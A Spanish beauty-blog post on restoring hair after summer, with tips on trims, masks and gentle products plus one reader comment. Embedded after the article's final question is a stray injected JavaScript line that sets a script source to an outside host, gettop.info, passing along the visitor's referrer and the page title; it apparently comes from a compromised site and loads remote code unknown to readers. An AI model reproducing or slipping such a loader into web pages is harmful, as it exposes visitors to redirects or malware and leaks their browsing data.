Salud y belleza » Belleza, Salud

Cuida la salud de tu pelo después del verano

1 Comentario

salud-del-cabelloTu pelo también necesita cuidados para estar saludable. A veces nos olvidamos de él y de su salud y por eso es importante recordar que es una parte muy importante de nuestro cuerpo y que un pelo saludable nos ayuda a parecer mucho más bellos y saludables. Normalmente el cabello es el que sale más perjudicado tras el verano debido al ataque del sol, el viento, la arena, el agua del mar y el de la playa. Además, los rayos UVA y UVB modifican la estructura del mismo. Así que al final del verano nos encontramos con un pelo deshidratado, muy frágil y con las puntas muy abiertas. Además, el color del pelo también puede modificarse perdiendo su brillo e incluso volviéndose verde en el caso de algunas melenas rubias.

Por ello es muy importante que nuestro pelo se recupere después del verano y se ponga a punto para la nueva temporada. Por ello por qué no ir al médico del pelo, nuestro peluquero, y pedirle un pequeño corte de puntas y una coloración para compensar la pérdida de tono de nuestro cabello por el sol.

También es recomendable aplicar durante varias semanas un día tratamientos específicos para dar vitalidad, brillo y suavidad a melenas castigadas para reparar nuestro cabello. Por ejemplo podemos usar mascarillas naturales con productos caseros o bien mascarillas profesionales, acondicionadores y champús que ayuden a restablecer el color, brillo y la estructura del pelo. Los productos reparadores y nutritivos son los más recomendados en esta época del año para devolver la belleza a nuestro cabello. Lo mejor es dejar actuar las mascarillas bajo un gorro de plástico tanto tiempo como se pueda para que actúe profundamente.

También existen una serie de trucos que te ayudarán a recuperar la salud de tu cabello de cara a la nueva temporada:

- No abusar de productos de peinado con alcohol porque resecan el pelo (laca, espuma, gel fijador…).

- Usar preferentemente peines y cepillos hechos de materiales naturales (concha, madera…).

- Utilizar colorantes vegetales sin amoníaco para que no dañen aún más el pelo.

- Lavar cada melena con el producto indicado para su tipo o su situación, usando en mayor medida productos hidratantes.

Esperamos que estos consejos te sirvan para recuperar la belleza de tu cabello después del verano.

¿Sabes algún truco más para ayudar a recuperar la salud del pelo?}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Lily said:

    Yo tengo ahora cita con el peluquero para cortar las puntas lo que no sé es si echarme un tinte. Tengo el pelo rubio y tampoco es que se haya puesto verde o se haya aclarado porque no he ido a la playa pero me gustaría darle un poco más de brillo.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.